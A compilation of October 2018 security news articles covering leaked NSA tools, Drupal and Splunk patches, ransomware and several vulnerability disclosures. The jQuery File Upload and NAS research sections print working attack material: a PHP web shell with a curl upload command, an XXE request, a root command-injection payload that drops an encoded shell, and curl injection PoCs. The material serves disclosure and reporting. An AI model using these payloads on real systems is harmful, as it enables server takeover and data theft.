The flaw would open any project used in production to data exfiltration, malware infection, defacement, and other types of attacks. One other issue would be that it’s virtually impossible to determine how many of the projects forked from the vulnerable plugin are being properly maintained or how many are being used in production environments.

NSA-Linked 'DarkPulsar' Exploit Tool Detailed
22.10.2018 securityweek

Kaspersky Lab security researchers have analyzed another exploit tool that was supposedly stolen from the National Security Agency-linked Equation Group.

Dubbed DarkPulsar, the tool is an administrative plugin, part of the NSA-linked exploits that the Shadow Brokers group made public in March 2017, specifically the DanderSpritz and FuzzBunch frameworks.

Part of FuzzBunch’s ImplantConfig category, which includes plugins for the post-exploitation stage, DarkPulsar was designed for controlling a passive backdoor named ‘sipauth32.tsp’, which provides remote control of compromised machines.

The DarkPulsar module includes support for a variety of commands, including Burn, RawShellcode, UpgradeImplant, and PingPong, which are meant to remove the implant, run arbitrary code, upgrade the implant, and check if the backdoor is installed on a remote machine, respectively. Other supported commands are EDFStagedUpload, DisableSecurity, and EnableSecurity.

Kaspersky Lab has determined that the DarkPulsar backdoor, which targets both 32-bit and 64-bit systems, was used on 50 victims located in Russia, Iran and Egypt, and that it typically infected machines running Windows Server 2003/2008. The victims are in the nuclear energy, telecommunications, IT, aerospace and R&D sectors.

The security researchers believe that the victims were the targets of a long-term espionage campaign. The backdoor not only includes an advanced mechanism of persistence, but also functionality to bypass the need to enter a valid username and password during authentication. It also encapsulates its traffic into legitimate protocols.

The infection campaign is believed to have stopped after the exploits were made public, but the backdoor likely remained on some of the compromised machines. The malware, however, can only be used by the real DarkPulsar managers, as it requires the private RSA key which pairs to the public key embedded in the backdoor.

“We found around 50 victims, but believe that the figure was much higher when the Fuzzbunch and DanderSpritz frameworks were actively used. We think so because of the DanderSpritz interface, which allows many victims to be managed at the same time,” Kaspersky Lab says.

The DarkPulsar administrative interface functions under the principle of “one command – one launch” and is a plugin of the FuzzBunch framework, which was designed to manage parameters and coordinate different components.

The researchers note that the framework for controlling infected machines is, in fact, DanderSpritz, which uses a plugin called PeddleCheap to configure implants and connect to infected machines to enable post-exploitation features.

Through DarkPulsar, a strong connection between DanderSpritz and FuzzBunch emerges. The backdoor is used to deploy the more functional PeddleCheap implant onto the victim machines, via PCDllLauncher, which apparently stands for ‘PeddleCheap DLL Launcher’.

Thus, the researchers concluded that FuzzBunch and DanderSpritz are designed not only to be flexible, but also to extend functionality and compatibility with other tools.

“Each of them consists of a set of plugins designed for different tasks: while FuzzBunch plugins are responsible for reconnaissance and attacking a victim, plugins in the DanderSpritz framework are developed for managing already infected victims,” Kaspersky concludes.

DarkPulsar and other NSA hacking tools used in hacking operations in the wild
22.10.2018 securityaffairs

Attackers are targeting high-value servers using three hacking tools from the NSA arsenal, including DarkPulsar, that were leaked by the Shadow Brokers hacker group.
The hackers used the powerful cyber weapons to compromise systems used in aerospace, nuclear energy, R&D, and other industries.

According to experts from Kaspersky Lab, threat actors leverage NSA tools DarkPulsar, DanderSpritz and Fuzzbunch to infect Windows Server 2003 and 2008 systems in 50 organizations in Russia, Iran, and Egypt.

The infected vulnerable servers are used in some 50 organizations within industries including aerospace and nuclear energy, particularly those with large IT and R&D departments.

“DanderSpritz consists entirely of plugins to gather intelligence, use exploits and examine already controlled machines. It is written in Java and provides a graphical windows interface similar to botnets administrative panels as well as a Metasploit-like console interface. It also includes its own backdoors and plugins for not-FuzzBunch-controlled victims.” Kaspersky Lab experts Andrey Dolgushev, Dmitry Tarakanov, and Vasily Berdnikov wrote.

“Fuzzbunch on the other hand provides a framework for different utilities to interact and work together. It contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc.”

DarkPulsar is a backdoor that could be used by attackers in conjunction with the Fuzzbunch exploit kit to gain remote access to the targeted server.

Once the backdoor is established the attackers could use the plugins of DanderSpritz to monitor and exfiltrate data from the compromised machines.


Each hacking tool supports a set of plugins designed for different tasks: the FuzzBunch plugins are used for reconnaissance and for compromising the target system, while the DanderSpritz plugins are used for managing already infected victims.

The discovery of this latest wave of attacks is significant because it demonstrates that threat actors can chain leaked nation-state hacking tools and exploits into a powerful attack package. It shows how the attackers combined the tools to carry out highly sophisticated hacking operations.

“The discovery of the DarkPulsar backdoor helped in understanding its role as a bridge between the two leaked frameworks, and how they are part of the same attacking platform designed for long-term compromise, based on DarkPulsar’s advanced abilities for persistence and stealthiness,” Kaspersky Lab said.

“The implementation of these capabilities, such as encapsulating its traffic into legitimate protocols and bypassing entering credentials to pass authentication, are highly professional.”

The experts from Kaspersky also provided technical details and IoCs for the attacks leveraging the NSA tools.

It is important to remind that security patches are available for the vulnerabilities targeted by the leaked NSA exploits.

“The FuzzBunch and DanderSpritz frameworks are designed to be flexible and to extend functionality and compatibility with other tools,” the experts conclude.

“Each of them consists of a set of plugins designed for different tasks: while FuzzBunch plugins are responsible for reconnaissance and attacking a victim, plugins in the DanderSpritz framework are developed for managing already infected victims.”

Drupal dev team fixed Remote Code Execution flaws in the popular CMS
22.10.2018 securityaffairs

The Drupal development team has patched several vulnerabilities in versions 7 and 8 of the popular CMS, including RCE flaws.
The development team of the Drupal content management system addressed several vulnerabilities in versions 7 and 8, including some flaws that could be exploited for remote code execution.

The Drupal team fixed a critical vulnerability in the Contextual Links module, which fails to properly validate requested contextual links. The flaw could be exploited for remote code execution by an attacker holding an account with the “access contextual links” permission.

“The Contextual Links module doesn’t sufficiently validate the requested contextual links.” reads the security advisory.
“This vulnerability is mitigated by the fact that an attacker must have a role with the permission “access contextual links”.”

Another critical vulnerability fixed by the development team is an injection issue that resides in the DefaultMailSystem::mail() function. The root cause of the bug is the lack of sanitization of some variables for shell arguments when sending emails.

“When sending email some variables were not being sanitized for shell arguments, which could lead to remote code execution.” continues the advisory.

The remaining vulnerabilities addressed in the CMS have been assigned a “moderately critical” rating; they include a couple of open redirect bugs and an access bypass issue related to content moderation.

The vulnerabilities have been addressed with the release of Drupal 7.60, 8.6.2 and 8.5.8.

The Drupal team urges users to install the security updates as soon as possible, as there is a concrete risk that threat actors in the wild will start exploiting the flaws in mass hacking campaigns.

Thousands of applications affected by a zero-day issue in jQuery File Upload plugin
22.10.2018 securityaffairs

A security researcher discovered a zero-day vulnerability, tracked as CVE-2018-9206, that affects older versions of the jQuery File Upload plugin since 2010.
Attackers can exploit the vulnerability to carry out several malicious activities, including defacement, exfiltration, and malware infection.

The flaw was reported by Akamai researcher Larry Cashdollar, who explained that many other packages that include the vulnerable code may be affected.

“This package has been included in various other packages and this code included in the projects web accessible path. It’s actively being exploited in the wild,” the researcher told the plugin author.

The jQuery File Upload is a jQuery widget “with multiple file selection, drag&drop support, progress bars, validation and preview images, audio and video.”

The plugin is widely adopted by numerous server-side platforms that support standard HTML form file uploads: PHP, Python, Ruby on Rails, Java, Node.js, Go, and others.

Cashdollar discovered two PHP files named upload.php and UploadHandler.php in the package’s source, which contained the file upload code.

The files were uploaded to the files/ directory in the root path of the webserver, so the expert wrote a command line test with curl and a simple PHP shell to confirm that it was possible to upload a web shell and run commands on the server.

$ curl -F "files=@shell.php" http://example.com/jQuery-File-Upload-9.22.0/server/php/index.php

Where shell.php is:

<?php $cmd=$_GET['cmd']; system($cmd);?>

“A browser connection to the test web server with cmd=id returned the user id of the web server’s running process. I suspected this vulnerability hadn’t gone unnoticed and a quick Google search confirmed that other projects that used this code or possibly code derived from it were vulnerable. There are a few Youtube videos demonstrating the attack for similar software packages.” wrote the expert.

Every project that leverages the plugin is potentially affected; the researcher pointed out that there are a few YouTube PoC videos demonstrating exploitation of similar software packages.

Cashdollar also published a proof-of-concept (PoC) code.

The root cause of the problem is that Apache disabled support for .htaccess in version 2.3.9 to improve performance (the server doesn’t have to check for this file every time it accesses a directory) and to prevent users from overriding security features that were configured on the server.

The side effect is that the technical choice left some developers and their projects open to attacks.

In order to address these changes and correct the file upload vulnerability in CVE-2018-9206 in Blueimp, the developer only allows file uploads to be of a content-type image.
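As an added example (not Blueimp’s code or its actual fix), the following Python upload validator shows why an image-only restriction must look at the file name and the file content rather than only at the Content-Type the client declares: a PHP file uploaded with a declared image type passes the weak check but fails the full one. The web root, upload directory, allow-list and sample bytes are assumptions constructed for this example.

```python
"""Added example, not Blueimp's code or its actual fix: server-side upload
validation for an image-only upload endpoint. The web root, upload directory,
allow-list and sample bytes are assumptions constructed for this example."""

import os
import secrets

WEB_ROOT = "/var/www/html"           # assumption: directory the web server serves
UPLOAD_DIR = "/var/www/uploads"      # assumption: deliberately outside WEB_ROOT

# Allowed image formats: extension -> (expected Content-Type, magic prefix)
IMAGE_TYPES = {
    "png": ("image/png", b"\x89PNG\r\n\x1a\n"),
    "jpg": ("image/jpeg", b"\xff\xd8\xff"),
    "gif": ("image/gif", b"GIF8"),
}


def declared_type_only(content_type: str) -> bool:
    """The weak check: trust the Content-Type the client declared."""
    return content_type.lower().startswith("image/")


def validate_upload(filename: str, content_type: str, data: bytes):
    """Return (accepted, reason).

    Accept only when the file name, the declared type and the leading bytes
    of the content all agree on one allow-listed image format.
    """
    if filename != os.path.basename(filename) or filename.startswith("."):
        return False, "path components or hidden file name rejected"
    stem, dot, ext = filename.rpartition(".")
    if not dot or not stem:
        return False, "missing extension"
    if "." in stem:
        # Double extensions such as shell.php.png are rejected outright.
        return False, "multiple extensions rejected"
    ext = ext.lower()
    if ext not in IMAGE_TYPES:
        return False, f"extension .{ext} not allow-listed"
    expected_type, magic = IMAGE_TYPES[ext]
    if content_type.lower() != expected_type:
        return False, f"declared type {content_type} does not match .{ext}"
    if not data.startswith(magic):
        return False, "content does not match the declared image format"
    return True, "ok"


def storage_path(ext: str) -> str:
    """Server-chosen random name under UPLOAD_DIR; the client never picks it."""
    return os.path.join(UPLOAD_DIR, f"{secrets.token_hex(16)}.{ext}")


# Constructed sample inputs.
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_BYTES = b"<?php echo 'hello'; ?>"

if __name__ == "__main__":
    print("weak check on shell.php as image/png:", declared_type_only("image/png"))
    print("full check on shell.php as image/png:",
          validate_upload("shell.php", "image/png", PHP_BYTES))
    print("full check on photo.png:", validate_upload("photo.png", "image/png", PNG_BYTES))
```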

“The internet relies on many security controls every day in order to keep our systems, data, and transactions safe and secure. If one of these controls suddenly doesn’t exist it may put security at risk unknowingly to the users and software developers relying on them.” concludes the expert.

“For software developers reviewing changes to the systems and libraries you rely on during the development of your project is a great idea as well. In the article above a security control was removed by Apache it not only removed a security control for Blueimp’s Jquery file upload software project but most of all of the forked code branches off of it. The vulnerability impacted many projects that depend on it from stand-alone web applications to WordPress plugins and other CMSs.”

Syrian victims of the GandCrab ransomware can decrypt their files for free
22.10.2018 securityaffairs

The developers of the GandCrab ransomware have released the decryption keys for all Syrian victims in an underground cybercrime forum.
The authors of the infamous GandCrab ransomware have released the decryption keys for all Syrian victims in an underground cybercrime forum.

Gandcrab developers’ post – Source: Bleeping Computer

The crooks decided to release the decryption keys after a Syrian Twitter user published a harrowing message asking for help after photos of his deceased children were encrypted by the ransomware.

جميل سليمان, Oct 16, 2018:
“@coveware Hello, my name is Jameel, I am a Syrian father who lost both his sons to the cruel war the country is going through. All I have left of my children is the photos and videos I took of them before they were mercilessly killed. And now GandCrab V5.0.3 has locked all of them.”

“They want 600 dollars to give me back my children, that's what they've done, they've taken my boys away from me for some filthy money. How can I pay them 600 dollars if I barely have enough money to put food on the table for me and my wife?”

The GandCrab developers explained that it was not their intention to infect Syrian users; their message on the hacking forum includes a link to a zip file containing the decryption keys for Syrian victims.

“This zip file contains the readme.txt in Russian language and SY_keys.txt files. The readme.txt file contains information on how the key file is organized and information on why the keys were released.” states Bleeping Computer.

“The most important thing is not to indicate that he will help everyone. It will help only a citizen of Syria. Because of their political situation, economic and relations with the CIS countries. We regret that we did not initially add this country to the exceptions. But at least that way we can help them now.” reads the message from the author of the ransomware.

The SY_keys.txt file includes a list of 978 decryption keys for Syrian victims whose systems have been infected with GandCrab version 1.0 through 5.0.

Syrian victims not included in the file could receive the decryption keys by providing the GandCrab developers with a picture of themselves, their passport, and their payment page. Providing crooks with pictures of a passport is very risky: such documents could be resold by the crooks or used by them for identity theft.

Experts believe that security firms will develop a decryption tool based on the released decryption keys.

WizCase Report: Vulnerabilities found in WD My Book, NetGear Stora, SeaGate Home, Medion LifeCloud NAS
22.10.2018 securityaffairs

Security researchers from WizCase have discovered several vulnerabilities in WD My Book, NetGear Stora, SeaGate Home, Medion LifeCloud NAS.
NAS devices have become the storage device of choice for many small and medium businesses (SMBs). They are inexpensive, easy to operate, and you can add additional storage if you’re running low on space. But are they secure enough to protect your company’s data? That was the question on our minds when we brought in security researchers Paulos Yibelo and Daniel Eshetu to see if they could exploit any vulnerabilities in the leading NAS devices.

We focused on discovering only critical vulnerabilities that can be exploited remotely without any user interaction, meaning that authentication bypasses weren’t enough: we wanted to execute commands on the devices remotely with the highest privileges. We were successful on all the devices.

Summary of Our Findings
We used four popular NAS devices for this project:

WD My Book
NetGear Stora
SeaGate Home
Medion LifeCloud NAS

We successfully gained root remote command execution on the devices, and therefore on the network they are on, simply by knowing their IP addresses.

All four NAS devices tested suffer from zero-day unauthenticated root remote command execution (preauth RCE) vulnerabilities.
The vulnerabilities allow hackers, governments, or anyone with malicious intent to read files, add/remove users, add/modify existing data, or execute commands with the highest privileges on all of the devices.
It is our belief that many other NAS devices suffer from similar vulnerabilities, as there seems to be a pattern of the security expected from NAS devices being missing.
Both vulnerabilities (tracked as CVE-2018-18472 and CVE-2018-18471) remain unpatched at the time of this publication.
There are nearly 2 million affected devices online.

CVE-2018-18472 – XXE and Unauthenticated Remote Command Execution in Axentra Hipserv NAS firmware
Axentra Hipserv is a NAS OS that runs on multiple devices and provides cloud-based login, file storage and management functionality for different devices. It is used in devices from several vendors; the affected devices sharing the firmware are:

Netgear Stora
Seagate GoFlex Home
Medion LifeCloud (maybe more).
The company provides firmware with a web interface that mainly uses PHP as the server-side language. The web interface has a REST API endpoint and a typical web management interface with file manager support.

Firmware Analysis.

After extracting the firmware and decoding the files, the PHP files were located in /var/www/html/ with the webroot in /var/www/html/html. The main handler for the web interface is homebase.php, and RESTAPIController.php is the main handler for the REST API. All the PHP files were encrypted using ionCube, which has a known public decoder, and given that the version used was an old one, decoding the files didn’t take long.

Part One: XXE

After decoding the files, we found that most of the API endpoints and the web interface were not accessible without authentication. One of the few exceptions was a handful of endpoints in the REST API interface. One of those endpoints is located at /api/2.0/rest/aggregator/xml, which loads XML data from the POST body; it uses DOMDocument for loading (parsing) the XML, which should not be vulnerable to XXE attacks.

However, the version of libxml2 used as a backend in the firmware is an old one, which means that external entity loading was not disabled by default, and that opened the endpoint to exploitation. Through this it was possible to read files and perform SSRF attacks. An example request is given below.

POST /api/2.0/rest/aggregator/xml HTTP/1.1
User-Agent: GoogleBot/2.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 246
Cookie: HOMEBASEID=c4be432f8add72db591aaa72c0fbbd34
Connection: close
Upgrade-Insecure-Requests: 1

<?xml version="1.0"?>
<!DOCTYPE requests [
<!ELEMENT request (#PCDATA)>
<!ENTITY % dtd SYSTEM "">
]>
<requests>
<request href="/api/2.0/rest/3rdparty/facebook/" method="GET"></request>
</requests>

The above request caused the XML parser to make a request to our server at for the file XXE_CHECK. Although the LFI was useful for grabbing some sensitive files, XML cannot carry binary data, so it was not possible to dump the SQLite database to get usernames and passwords.

That meant we were able to read files and make SSRF requests on any of the devices below:

Netgear Stora
Seagate GoFlex Home
Medion LifeCloud
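As an added illustration of the fix this endpoint needed (example code written for this page, not the Hipserv firmware, in Python rather than the firmware's PHP): refuse any submitted XML that carries a DOCTYPE or entity declaration before it reaches the parser, so external entity loading can never be triggered regardless of the libxml2 default. The `<requests>` body shape is assumed from the request shown above.

```python
import xml.parsers.expat
import xml.etree.ElementTree as ET

# Hypothetical replacement for the aggregator endpoint's XML handling, written as
# an example; it is not code from the Hipserv firmware. The rule it enforces is the
# one the firmware lacked: no DTD at all, so no entity can ever be resolved.


class DtdNotAllowed(ValueError):
    """Raised when the submitted XML declares a DOCTYPE or any entity."""


def _scan_for_dtd(body: bytes) -> None:
    """Walk the document with expat and abort at the first DTD construct."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdNotAllowed(f"DOCTYPE '{name}' is not accepted")

    def on_entity(*_args):
        raise DtdNotAllowed("entity declarations are not accepted")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(body, True)  # raises ExpatError on malformed XML


def parse_aggregator_requests(body: bytes) -> list:
    """Return the (href, method) pairs from a DTD-free <requests> document.

    Documents carrying a DTD are rejected before any element is looked at;
    malformed input raises xml.parsers.expat.ExpatError as usual.
    """
    _scan_for_dtd(body)
    root = ET.fromstring(body)
    if root.tag != "requests":
        raise ValueError(f"unexpected root element <{root.tag}>")
    return [(r.get("href", ""), r.get("method", "GET")) for r in root.iter("request")]


def classify_body(body: bytes) -> str:
    """Triage helper for captured request bodies: 'ok', 'dtd' or 'malformed'."""
    try:
        parse_aggregator_requests(body)
        return "ok"
    except DtdNotAllowed:
        return "dtd"
    except (xml.parsers.expat.ExpatError, ET.ParseError, ValueError):
        return "malformed"


# Constructed samples: the first mirrors the XXE probe shown above (entity URL
# left empty as on the page); the second is what a legitimate client would send.
XXE_PROBE = b"""<?xml version="1.0"?>
<!DOCTYPE requests [
<!ELEMENT request (#PCDATA)>
<!ENTITY % dtd SYSTEM "">
]>
<requests><request href="/api/2.0/rest/3rdparty/facebook/" method="GET"></request></requests>"""

CLEAN_BODY = b"""<?xml version="1.0"?>
<requests><request href="/api/2.0/rest/3rdparty/facebook/" method="GET"></request></requests>"""

if __name__ == "__main__":
    print(classify_body(XXE_PROBE))           # dtd
    print(parse_aggregator_requests(CLEAN_BODY))
```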
Part Two: RCE

Looking at how the web interface (the REST API in particular) performed root actions was the next step. Since the web server runs as a non-root user and has no sudo rights, we dug further and found that the REST API makes calls to a local daemon named oe-spd, which runs on port 2000 bound to

The daemon takes XML data, parses the request and carries out the action without any authentication, except for making sure the request came from What’s more, the daemon skips over junk data until it finds the string <?xml version="1.0"?>, as shown in the IDA snippet below.

strstr(*input_data, "<?xml version=\"1.0\"?>");

This made things a lot easier: since the request is going to be sent using the HTTP protocol, skipping over the junk data (junk from the daemon’s point of view) was a real help. But since we can’t directly put the URL in the XML file, we make the XML parser send a request to a PHP script (or anything that does the redirection, really) that redirects it to *payload here*.

Since the daemon is chock-full of command execution bugs, it was easy to craft a request that triggered one. Additionally, since the daemon runs with root privileges, it is possible to perform any action on the device. An example payload is given below.

* This payload uploads a simple PHP shell to /var/www/html/html/u.php (<device-ip>/u.php?cmd=id).

<?xml version="1.0"?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name="disk">a`echo PD9waHAKZWNobyAnPHByZT4nOwpzeXN0ZW0oJF9HRVRbJ2NtZCddKTsKZWNobyAnPC9wcmU+JzsKPz4K | base64 -d >/var/www/html/html/u.php`</parameter></proxy_request>

Putting it all together.
To chain the vulnerabilities seamlessly, we need a server the device can make an outbound connection to, and the following simple PHP script to redirect the parser, send the payload and handle a little multi-staging of payloads.

CVE-2018-18472 – WD MyBook Live Unauthenticated Remote Command Execution
WD MyBook Live and some models of WD MyCloud NAS contain a remotely exploitable vulnerability that lets anyone run commands on the device as root. The vulnerability exists in the language change/modify functionality of the REST API; the following PoC demonstrates this flaw.

curl -kX PUT -d 'language=en_US`<linux command here>`' https://<NAS_IP>/api/1.0/rest/language_configuration

curl -kX PUT -d 'language=en_US`id > /var/www/id.txt`' https://<NAS_IP>/api/1.0/rest/language_configuration

The PoC will create an id.txt file in the webroot containing the output of the id command. The file can be removed using the following PoC:

curl -kX PUT -d 'language=en_US`rm -rf /var/www/id.txt`' https://<NAS_IP>/api/1.0/rest/language_configuration
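The WD language_configuration PoC and the oe-spd `disk` parameter earlier exploit the same defect: a request value spliced into a shell command line, where backticks run as root. The following added example (not Western Digital's or Axentra's code; the set_language.sh path is a placeholder) shows the allowlist validation and argv-only invocation that close it, plus a metacharacter check usable for log triage.

```python
import re
import subprocess

# Hypothetical handler written for this example; it is not Western Digital's
# or Axentra's firmware code. The PoC works because the 'language' value is
# handed to a shell unchanged, so whatever sits between backticks is executed.

LOCALE_RE = re.compile(r"[a-z]{2,3}_[A-Z]{2}")            # en_US, de_DE, ...
SHELL_META = set("`$;|&<>()\n\"'\\ ")                     # characters a shell interprets
SET_LANGUAGE_SCRIPT = "/usr/local/sbin/set_language.sh"   # placeholder path (assumed)


def is_valid_locale(value: str) -> bool:
    """Allowlist: only values shaped like a locale tag are accepted."""
    return LOCALE_RE.fullmatch(value) is not None


def has_shell_metachars(value: str) -> bool:
    """Triage helper for access logs: does the parameter carry shell syntax?"""
    return any(ch in SHELL_META for ch in value)


def vulnerable_command_line(language: str) -> str:
    """The defective pattern: one string destined for /bin/sh (never executed here)."""
    return f"{SET_LANGUAGE_SCRIPT} {language}"


def safe_argv(language: str) -> list:
    """Validate first, then build an argv list so no shell ever sees the value."""
    if not is_valid_locale(language):
        raise ValueError(f"rejected language value: {language!r}")
    return [SET_LANGUAGE_SCRIPT, language]


def would_reject(language: str) -> bool:
    """True when the hardened handler refuses the value."""
    try:
        safe_argv(language)
    except ValueError:
        return True
    return False


def apply_language(language: str, runner=subprocess.run):
    """Run the helper with shell=False; 'runner' is injectable so tests spawn nothing."""
    return runner(safe_argv(language), shell=False, check=True)


# Constructed value mirroring the PoC above.
PROBE = "en_US`id > /var/www/id.txt`"

if __name__ == "__main__":
    print(vulnerable_command_line(PROBE))   # backticks survive into the shell line
    print(would_reject(PROBE), safe_argv("en_US"))
```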

What does this mean to the affected NAS users?
If you are using one of the above devices and it is connected to the WAN, make sure to remove the device from the internet (make sure it is only reachable from a local, trusted network).
Make sure to contact the affected vendors and insist they release a patch as soon as possible!
We will update this article as a patch becomes available.
We also recommend you use a VPN to protect your computers and mobile devices from hackers. ExpressVPN and NordVPN both use AES 256-bit encryption and will secure all your data. (This won’t protect you from a NAS attack, but it will protect you from other cyber attacks.)

Hackers breached into system that interacts with HealthCare.gov
22.10.2018 securityaffairs

The Centers for Medicare and Medicaid Services announced that hackers breached a computer system that interacts with HealthCare.gov.
Hackers breached a computer system that interacts with HealthCare.gov, according to the Centers for Medicare and Medicaid Services; the attackers accessed the sensitive personal data of some 75,000 people.

After experts discovered the intrusion, the system was shut down and the IT staff is working to restore the operation.

“Officials said the hacked system was shut down and technicians are working to restore it before sign-up season starts Nov. 1 for health care coverage under the Affordable Care Act.” reported the Associated Press.

“The system that was hacked is used by insurance agents and brokers to directly enroll customers. All other sign-up systems are working.”

In the US, Barack Obama’s health care law provides private coverage for about 10 million people, who in order to access the service have to provide extensive personal information, including Social Security numbers, income, and citizenship or legal immigration status.

Starting November 1, people can log in to HealthCare.gov, fill out an application, and enroll in a 2019 Marketplace health plan.

A spokesman for the Centers for Medicare and Medicaid declared that “nothing happened” to the HealthCare.gov website that is used by the general public.

“This concerns the agent and broker portal, which is not accessible to the general public,” he said.

Law enforcement is investigating the incident, and affected customers have been notified that they will receive free credit protection.

Chinese Hackers Use 'Datper' Trojan in Recent Campaign
21.10.2018 securityweek

A China-linked cyber espionage group known as Tick was observed using the Datper malware in a recent campaign, Cisco Talos security researchers reveal.

Also referred to as Redbaldknight and Bronze Butler, Tick has been launching various cyber-attacks against entities in South Korea and Japan over the past couple of years. The campaign Talos analyzed also used compromised websites located in the two countries as command and control (C&C) servers.

Although Tick has been using custom tools in each campaign, the researchers observed a series of recurring patterns in the use of infrastructure, such as overlaps in hijacked C&C domains or the use of the same IP.

Based on these infrastructure patterns, the experts discovered similarities between the Datper, xxmm backdoor, and Emdivi malware families that the threat actor has used in attacks.

Datper, the malware used in the campaign Talos analyzed, can execute shell commands on the victim machine, while also obtaining hostnames and drive information. The used infection vector, however, is unknown, Talos says.

The analyzed Datper variant used the compromised website of a legitimate Korean laundry service to host its C&C. Located at whitepia[.]co.kr, the site does not use SSL encryption or certificates, which left it vulnerable to attacks.

The security researchers observed other compromised websites as well being used as C&C servers as part of the attack. This led to the hypothesis that the malware could be delivered via web-based assaults, such as drive-by downloads or watering hole attacks.

Talos also discovered hosts that were being used as C&C servers although they were not connected to compromised websites. This would suggest that the hackers initially deployed the C&C infrastructure on legitimately obtained (and potentially purchased) hosts.

“The actor behind this campaign deployed and managed their C&C infrastructure mainly in South Korea and Japan. We confirmed that the actor periodically changed their C&C infrastructure and appears to have a history of identifying and penetrating vulnerable websites located in these countries,” Talos says.

Once on the infected machine, Datper would create a mutex object and retrieve several pieces of information from the victim machine, including system information and keyboard layout. Next, the malware attempts to issue an HTTP GET request to the C&C server (which was unavailable during investigation).

Some of the compromised websites were also used as C&C domains for the xxmm backdoor, also known as Murim or Wrim, which was previously associated with the threat actor, and which allows attackers to install additional malicious tools onto the infected machines. The two samples also use similar GET request URI paths.

A Datper variant compiled in March 2018 was observed using a legitimate website as C&C, resolving to the same IP used for the C&C infrastructure of the Emdivi malware family. This Trojan opens a backdoor on the compromised machines and was previously attributed to the threat actor behind the campaign "Blue termite."

“Talos’ investigation into attacks conducted by this actor indicates commonalities between the Datper, xxmm backdoor, and Emdivi malware families. Specifically, these similarities are in the C&C infrastructure of attacks utilizing these malware families. Some C&C domains used in these attacks resolve to hijacked, legitimate South Korean and Japanese hosts and may have been purchased by the attacker,” Talos concludes.

Flaws Open Telepresence Robots to Prying Eyes
21.10.2018 securityweek

Vulnerabilities in telepresence robots could provide an attacker not only with command execution capabilities, but also with access to a live video stream from the device, Zingbox reports.

The healthcare IoT analytics platform provider has analyzed the VGo telepresence robot from Vecna. Nicknamed “Celia,” it has an XMPP chat client that supports voice and video communication over the VGoNet Cloud Network.

When a call is connected, the caller, whose face is displayed on the device’s screen, can control the robot using the client interface. In addition to voice calls and video streaming, the robot can speak text messages, move around at different speeds, take pictures, and recognize speech.

During its assessment of the device, Zingbox discovered five vulnerabilities that it reported to the manufacturer via ICS-CERT. These include issues usually found in IoT devices, such as insufficiently protected credentials and the transmission of sensitive information in cleartext.

One of the most important issues discovered in the device was the fact that firmware updates were being delivered over HTTP. Tracked as CVE-2018-8860, the vulnerability could allow an attacker sniffing the network to intercept the update.


Next, the attacker could use various tools to peek inside the intercepted firmware and find weaknesses to target in order to compromise the robot. The Zingbox security researchers did find such an issue in the form of a CGI script that, being a development tool, was not supposed to be included in production.

“It could run limited commands on the robot, probably for diagnostics, such as those to view running processes, view logs, reboot the robot, and see network connections,” the researchers explain in a report (PDF).

Tracked as CVE-2018-8866, the next vulnerability is that most of the GET parameters of the CGI script are vulnerable to command injection, due to the lack of input validation. This provided the researchers with arbitrary command execution capabilities.

Because the CGI script runs with root privileges, the researchers could also gain unauthorized root access to the robot. Leveraging such privileges, an attacker could then abuse the robot to target other systems located in the same network segment.

Code execution could also be achieved with physical access to the USB slot located in the back of the robot. An attacker with a USB stick containing a file with the name startup.script inside a config folder in the root partition could gain code execution by simply plugging in the device into the port and rebooting the robot.

Once inside the robot, the researchers also discovered that Wi-Fi and robot XMPP credentials were stored in plain text (CVE-2018-8858). Armed with the Wi-Fi credentials, an attacker could then start attacking other assets on the network.

The security researchers also discovered chat information in log files, thus being able to read and steal text messages sent between the conversation partners. With the pictures taken by the robot being temporarily stored locally in the robot’s file system, an attacker who already has access to the robot can also retrieve those when they are created.

Moreover, an attacker “can capture live video streaming remotely and start watching the victims live,” the researchers warn.

The vendor has released an update that patches the vulnerabilities. Automatic updates are enabled by default.

Splunk Patches Several Flaws in Enterprise, Light Products
21.10.2018 securityweek 

Splunk recently patched several vulnerabilities in its Enterprise and Light products, including flaws that have been rated “high severity.”

Splunk Enterprise allows organizations to search, analyze and visualize data collected from websites, apps, sensors and other devices. Splunk Light is a solution that automates log searching and analysis, along with server and network monitoring, in small IT networks.

The most serious of the vulnerabilities affecting these products – with a CVSS score of 8.1 (high severity) – is CVE-2018-7427, a cross-site scripting (XSS) issue in the Splunk Web interface.

Another serious flaw allows an attacker to cause a denial-of-service (DoS) condition by sending a specially crafted HTTP request to Splunkd, the system process that handles indexing, searching and forwarding. This bug is tracked as CVE-2018-7429.

CVE-2018-7432 is a similar DoS flaw that can be exploited using malicious HTTP requests sent to Splunkd, but the vendor has only assigned it a “medium severity” rating.

The last vulnerability, tracked as CVE-2018-7431 and also rated “medium severity,” has been described as a path traversal issue that allows an authenticated attacker to download arbitrary files from the Splunk Django app.

Two of the vulnerabilities affect Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.7, 6.3.x before 6.3.10, 6.2.x before 6.2.14, 6.1.x before 6.1.13, 6.0.x before 6.0.14, and Splunk Light before 6.6.0. CVE-2018-7432 affects the same versions, except for 6.1.x and 6.0.x. CVE-2018-7429 impacts Enterprise 6.4.x before 6.4.8, 6.3.x before 6.3.11, 6.2.x before 6.2.14, and Light before 6.5.0.

Splunk says it has found no evidence to suggest that these vulnerabilities have been exploited for malicious purposes.

“To mitigate these issues, Splunk recommends upgrading to the latest release and applying as many of the Hardening Standards from the Securing Splunk documentation as are relevant to your environment. Splunk Enterprise and Splunk Light releases are cumulative, meaning that future releases will contain fixes to these vulnerabilities, new features and other bug fixes,” Splunk said in an advisory.

Remote Code Execution Flaws Patched in Drupal
21.10.2018 securityweek
Developers of the Drupal content management system (CMS) have patched several vulnerabilities in the 7 and 8 branches, including serious flaws that can be exploited for remote code execution.

One of the security holes, rated “critical,” affects the Contextual Links module, which fails to properly validate requested contextual links. The vulnerability can allow remote code execution, but the attacker requires an account with the “access contextual links” permission for exploitation.

